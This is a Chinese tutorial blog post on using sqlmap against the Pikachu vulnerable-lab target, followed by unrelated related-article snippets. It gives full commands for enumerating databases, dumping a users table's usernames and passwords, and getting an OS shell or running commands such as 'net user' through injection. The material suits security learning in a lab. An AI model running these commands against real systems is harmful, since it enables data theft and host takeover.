【网络安全学习】SQL注入02:使用sqlmap进行注入

news2024/12/29 9:37:02

1.sqlmap的基本功能

sqlmap的基本功能是对Web应用中的数据库进行自动化的检测、利用和攻击。

使用pikachu靶场进行sqlmap的基础功能使用。

1️⃣ 第一步:先检查是否有注入点:

# -u : 指定目标url,也就是指定注入点
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2"

在这里插入图片描述

2️⃣ 第二步:再使用--dbs参数获取数据库。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dbs
# --dbs : 读取数据库

在这里插入图片描述

3️⃣ 第三步:查看当前应用使用的数据库。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --current-db
# --current-db : 列出当前应用所用的数据库

在这里插入图片描述

4️⃣ 第四步:列出指定数据库的所有表。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --tables -D pikachu
# --tables : 获取数据库表
# -D : 指定数据库

在这里插入图片描述

5️⃣ 第五步:读取指定表中的字段名称。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --columns -T users -D pikachu
# --columns : 列取字段名

在这里插入图片描述

6️⃣ 第六步:读取指定字段内容。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dump -C level,password,username -T users -D pikachu
# --dump : 为转存数据
# -C : 指定字段名称
# -T : 指定表名
# -D : 指定数据库名称。

在这里插入图片描述

在读取数据后,SQLMap将会把读取的数据转存到**SQLMap/output/目录下,文件以“[Table名].cvs**”保存.
在这里插入图片描述

通过以上步骤便完成了一个正常SQL注入并读取数据库数据的流程。

2. sqlmap参数

2.1 测试注入点权限

# 测试所有用户的权限
sqlmap -u "[URL]" --privileges
# 测试sa用户权限
sqlmap -u "[URL]" --privileges -U sa

2.2 执行Shel​l命令

# 执行net user命令
sqlmap -u "[URL]" --os-cmd="net user"
# 系统交互的shell
sqlmap -u "[URL]" --os-shell

2.3 获取当前数据库名称

sqlmap -u "[URL]" --current-db

2.4 执行SQL命令

# 返回sql交互的shell,执行sql语句
sqlmap -u "[URL]" --sql-shell

在这里插入图片描述

2.5 POST提交方式

sqlmap -u "[URL]" --data "POST参数"

2.6 显示详细的等级信息

sqlmap -u "[URL]" --dbs -v 1
# -v参数包含以下7个等级。
# 0:只显示Python的回溯、错误和关键消息;
# 1:显示信息和警告消息;
# 2:显示调试消息;
# 3:有效载荷注入;
# 4:显示HTTP请求;
# 5:显示HTTP响应头;
# 6:显示HTTP响应页面的内容。

2.7 注入HTTP请求

sqlmap -r head.txt --dbs
# head.txt中是HTTP请求的头信息

head.txt的内容大致如下:

POST /login.php HTTP/1.1
Host:www.xxx.com
User-Agent:Mozilla/5.0
username=xxx&yyy=zzz

2.8 使用SQLMap插件

sqlmap -u "[URL]" -tamper "插件名.py"

SQLMap可以使用插件,插件都保存在SQLMap目录下的tamper文件夹中,如下图所示:
在这里插入图片描述

关于SQLMap详细的使用可以参考官方说明:

https://github.com/sqlmapproject/sqlmap/wiki/Usage

🌟 以上就是SQLMap的一些基础的使用说明。 🌟

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1987009.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

终端命令行|CLI工具|CMD|PowerShell

基本概念 终端是一个文本界面,用于执行基于文本的程序。 果你正在运行任何用于 web 开发的工具,你一定需要打开命令行并运行一些命令来使用你所选择的工具 (这样的工具被称为CLI 工具也就是命令行接口工具)。 命令行接口工具 (CLI 工具) 是什么&#xf…

延伸--人工鱼群算法

目录 基本原理 改进策略 代码示例 应用实例 总结 人工鱼群算法在解决多峰函数问题中的具体应用案例和效果如何? 双群人工鱼群算法与传统人工鱼群算法相比,有哪些具体的改进和优势? 步长自适应调整在人工鱼群算法中的实现机制是什么&a…

vue3踩坑问题记录

//vue3element-plus //1、placeholder换行显示 const startTxt ref() const contentText ref<any>() startTxt.value "请描述问题内容、例如&#xff1a;" historyData.prompt.forEach((el:any)>{contentText.value \n${el.question}}) <ElInputv-mo…

点赞收藏测试文章(让我看看有多少机器人在刷互动量)

前言 这里有一些看似合理但实际毫无意义的句子&#xff0c;我需要用它来看看跟我互动的有多少机器人 如果你是人类用户&#xff0c;可以用评论来代替点赞&收藏&#xff0c;爱你~ 目录 前言 正文 1. 紫色的大象在夜空中游泳。 2. 月亮上的饼干师烤出了一片海洋。 3. 时…

数据结构(邓俊辉)学习笔记】词典 03—— 排解冲突(1)

文章目录 1. 一山二虎2. 泾渭分明3. 开放定址4. 线性试探5. 赖惰删除 1. 一山二虎 此前我们已经多次指出&#xff0c;对于需要动态维护的散列表冲突是不可避免的&#xff0c;无论你的散列函数设计的有多么精妙&#xff0c;因此我们不得不回答的第二个重要问题就是一旦发生冲突&…

苹果电脑维护工具:CleanMyMac X让你的Mac焕发新生!

在我们的数字生活中&#xff0c;苹果电脑&#xff08;Mac&#xff09;已成为不可或缺的一部分&#xff0c;无论是为工作披星戴月&#xff0c;还是为娱乐畅游云端。但是&#xff0c;就像任何长时间运行的机器一样&#xff0c;Mac也可能会因为积累的文件和不必要的数据而开始变慢…

DAMA学习笔记(十一)-元数据管理

1.引言 元数据最常见的定义是“关于数据的数据”。它描述了数据本身&#xff08;如数据库、数据元素、数据模型&#xff09;&#xff0c;数据表示的概念&#xff08;如业务流程、应用系统、软件代码、技术基础设施&#xff09;&#xff0c;数据与概念之间的联系&#xff08;关系…

60页PPT数据湖 + 数据中台实施方案

关注智慧方案文库&#xff0c;学习8700多份智慧城市&#xff0c;智慧医院&#xff0c;智能制造&#xff0c;数字化转型&#xff0c;新质生产力&#xff0c;算力&#xff0c;大模型&#xff0c;AIGC&#xff0c;工业互联网&#xff0c;数字孪生......持续更新热点行业解决方案。…

.NET C# Dictionary Hashtable

.NET C# Dictionary & Hashtable 文章目录 .NET C# Dictionary & Hashtable1 Dictionary1.1 底层实现1.2 优点1.3 缺点 2 Hashtable2.1 底层实现2.2 优点2.3 缺点 3 对比总结4 遍历方式&#xff0c;与耗时对比foreach遍历Keys遍历IDictionaryEnumerator遍历耗时对比 1 …

自动化报表实践小结

这一天午休刚休息完&#xff0c;财务经理就喊我&#xff1a;“***&#xff0c;我们找个会议室聊聊”。我是一脸茫然&#xff0c;心里想着&#xff0c;我跟他也没什么私下的工作交流啊&#xff0c;能聊啥呢&#xff0c;还要找个会议室&#xff1f;究竟是什么事情呢&#xff1f;有…

VsCode无法远程调试

一、问题描述 按照《VsCode gdb gdbserver远程调试C程序》中介绍的方法&#xff0c;配置好VsCode后&#xff0c;按下F5快捷键&#xff0c;或点击“Start Debugging”按钮&#xff0c;没有反应&#xff0c;无法启动调试&#xff1a; 二、解决方法 针对该问题&#xff0c;我尝…

【人工智能】Transformers之Pipeline(八):文生图/图生图(text-to-image/image-to-image)

目录 一、引言 二、文生图/图生图&#xff08;text-to-image/image-to-image&#xff09; 2.1 文生图 2.2 图生图 2.3 技术原理 2.3.1 Diffusion扩散模型原理 2.3.2 Stable Diffusion扩散模型原理 2.4 文生图实战 2.4.1 SDXL 1.0 2.4.2 SD 2.0 2.5 模型排名 三、总…

​【香菇带你学Mysql】Mysql超长执行sql定位和优化【建议收藏】

本文为MySQL数据库管理员和开发人员提供了一套全面的超时SQL定位和优化解决方案。通过合理运用这些方法和技巧&#xff0c;可以显著提升MySQL数据库的性能和稳定性&#xff0c;减少超时SQL语句的发生&#xff0c;确保数据库的高效运行。 0. 引言 最近某个Mysql数据库频繁告警…

统信UOS激活系统故障

统信UOS激活系统故障 1. 离线环境下如何激活系统 ①点击右下角的授权管理 ②点击“激活” ③输入激活码,并点击确定 ④离线环境下此时会弹出二维码,使用微信去扫码,按照提示确定激活 ⑤微信确定以后,激活端会显示成功 2. 激活过程中提示服务器连接失败 激活时如果提示服…

Java多商户新零售超市外卖商品系统

解锁新零售奥秘&#xff0c;多商户外卖超市商品系统大揭秘&#xff01; &#x1f31f; 开篇&#xff1a;新零售时代的浪潮 在这个日新月异的数字化时代&#xff0c;新零售已悄然成为商业变革的新风口。想象一下&#xff0c;足不出户就能逛遍全城商家&#xff0c;心仪商品一键…

智算与大模型人才白皮书学习

目录 智算定义 智算的相关政策 公司的智算战略 服务提供者的定义及服务内容 智算人才需求 典型智算参与者的角色要求 业务流程全过程的分解 自己的定位 智算定义 智算通过智能化技术手段优化和提升技术系统的功能和性能&#xff0c;是为满足未来人工智能发展 和相关应用…

如何快速发现SIM卡托潜在问题?

手机SIM卡托通常是指放置SIM卡的卡槽或卡托。SIM卡托位于手机的侧面或顶部&#xff0c;用于插入SIM卡以连接到移动网络。通常&#xff0c;用户可以通过将SIM卡插入手机SIM卡托来激活手机服务、接收通话、发送短信和使用移动数据。SIM卡托一般设计成易于插拔&#xff0c;使用户能…

DataWhale AI夏令营-英特尔-阿里天池LLM Hackathon

英特尔-阿里天池LLM Hackathon 项目思路项目背景项目思路 Lora微调Qwen模型使用ipex_llm推理加速Gradio交互 项目名称&#xff1a;医疗问答助手 项目思路 项目背景 在当今医疗领域&#xff0c;智能问答系统正在逐步成为辅助医疗诊断的重要工具。随着自然语言处理技术的发展&…

基于STM32的智能家居灯光控制系统

目录 引言环境准备工作 硬件准备软件安装与配置系统设计 系统架构硬件连接代码实现 初始化代码灯光控制代码应用场景 智能家居灯光控制办公环境智能照明常见问题及解决方案 常见问题解决方案结论 1. 引言 随着智能家居技术的发展&#xff0c;灯光控制系统在提升家居生活品质…

尝鲜 HarmonyOS NEXT 开发环境搭建

申请好 HarmonyOS NEXT的开发套件白名单后&#xff0c;就可以下载最的开发套件了&#xff0c;最新的开发工具更新时间是2024-06-17&#xff0c;DevEcoStudio5.0-API12-x86-402。下载后是这样的&#xff1a; 我用的是 MAC PRO&#xff0c;所以下载的是 MAC 版&#xff0c;这里有…